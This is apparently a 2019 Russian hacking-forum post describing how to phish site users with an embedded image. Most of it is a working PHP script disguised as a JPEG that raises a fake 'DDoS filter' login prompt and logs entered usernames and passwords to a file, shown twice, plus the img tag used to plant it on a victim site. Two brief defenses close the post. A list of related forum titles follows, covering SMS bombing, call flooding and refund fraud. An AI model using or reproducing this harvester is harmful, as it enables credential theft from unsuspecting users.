Взлом пользователей через картинку 2019

magazver_inactive · 25 мар 2019

Теория и практика

1. Хакер регистрирует себе домен похожий по написанию на атакуемый домен.

2. Загружает на него скрипт c таким содержимым на PHP

<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
$vulnsite = parse_url($_SERVER['REFERER']);
//header('Content-Type: text/html; charset=windows-1251');
//header('WWW-Authenticate: Basic realm="'.ucfirst($vulnsite['host']).' DDoS-Filter: Enter your Login and Password"');
//header('HTTP/1.0 401 Unauthorized');
} else {
$f = fopen('passes.txt', 'a');
fwrite($f, $_SERVER['PHP_AUTH_USER'].';'.$_SERVER['PHP_AUTH_PW']."\r\n");
fclose($f);
}
header("Content-type: image/jpeg");
$image = imagecreatefromjpeg('image.jpg');
imagejpeg($image);
imagedestroy($image);
exit();

//Соответственно в этой же папке лежит нормальная image.jpg
//Тут же можно поиграться с расширением скрипта и обозвать его superphoto.jpg .
?>

Код

<?php if (!isset($_SERVER['PHP_AUTH_USER'])) { $vulnsite = parse_url($_SERVER['REFERER']); //header('Content-Type: text/html; charset=windows-1251'); //header('WWW-Authenticate: Basic realm="'.ucfirst($vulnsite['host']).' DDoS-Filter: Enter your Login and Password"'); //header('HTTP/1.0 401 Unauthorized'); } else { $f = fopen('passes.txt', 'a'); fwrite($f, $_SERVER['PHP_AUTH_USER'].';'.$_SERVER['PHP_AUTH_PW']."\r\n"); fclose($f); } header("Content-type: image/jpeg"); $image = imagecreatefromjpeg('image.jpg'); imagejpeg($image); imagedestroy($image); exit(); //Соответственно в этой же папке лежит нормальная image.jpg //Тут же можно поиграться с расширением скрипта и обозвать его superphoto.jpg . ?>

3. Пишет статью, и встраивает картинку в пост:

<img src="http://exEmple.com/evilimage.php" alt="image"/>

4. Если присутствует модерация на сайте, то отправляет статью на модерацию.

5. К примеру статья получилась у него хорошая и она попадает на главную.

6. Злой человек видит своё детище на главной и убирает комментарии в PHP коде, таким образом в ответ на запрос картинки из поста, у любого пользователя в браузере появляется окно с авторизацией, где может быть написано все что угодно, к примеру что сайт отбивается от ДДос атаки, и просит повторить ввод логина и пароля.

7. Не внимательный пользователь, не вчитывается в название домена в форме авторизации и субмитит логин и пароль.

8. Злой человек получает ваш логин и пароль, его цель достигнута.

Способы защиты

Думаю вменяемых методов может быть два:

На уровне браузеров: запрет на выдачу окна авторизации от другого сайта

На уровне разработчиков сайтов: Копирование всех удалённых ресурсов к себе на хостинг

P.S работает не во всех браузерах.

Как правильно общаться с девушками

Делаем эффективный СМС-Бомбер бесплатно

Рефаунд доставки еды: как вернуть 100%-50% от стоимости заказа

Сколько бы стоила рекламная компания Lolzteam от fatMAD

Сдача WhatsApp в аренду. Чернуха в красивой обертке.

Этичный пентест альтушки

Способы сноса

Когнитивные искажения и почему наш мозг нас обманывает

Ищем вебкамщицу по фотке

Самый пиздатый гайд на гпт чат

Как прокачать свою Социальную Инженерию

ПОЛЕЗНЫЕ САЙТЫ для маминых хакеров

Probuzhdenny: Код влияния

Парадокс выбора

Новый способ ******а Вконтакте.

Исскуство раппорта.

Небольшой Список | Telegram Bots | Подделка Скриншотов и Не только

Nulled / cracked seized (news)

Как я получил военный билет в 2021 году.

Социальная инженерия - навык который обязан быть у каждого

10 Правил Социальной Инженерии (Для новичков)

Социальная инженерия, психология и как это работает.

Оффлайн-инженерия. Халявный проход через любую закрытую дверь.

Снимаем 161- ФЗ

Будущее работы: как технологии изменят способ, которым мы работаем

Как не стать жертвой социальной инженерии: практические советы и рекомендации

[Гайд] Как знакомиться с девушками и исключать сюрпризы (подробно)

Как начать общение с твоей симпатичной одноклассницей?

Как бесплатно сделать атаку звонками.

Как вывести крипту в ограниченном кошельке телеграмм

Взлом пользователей через картинку 2019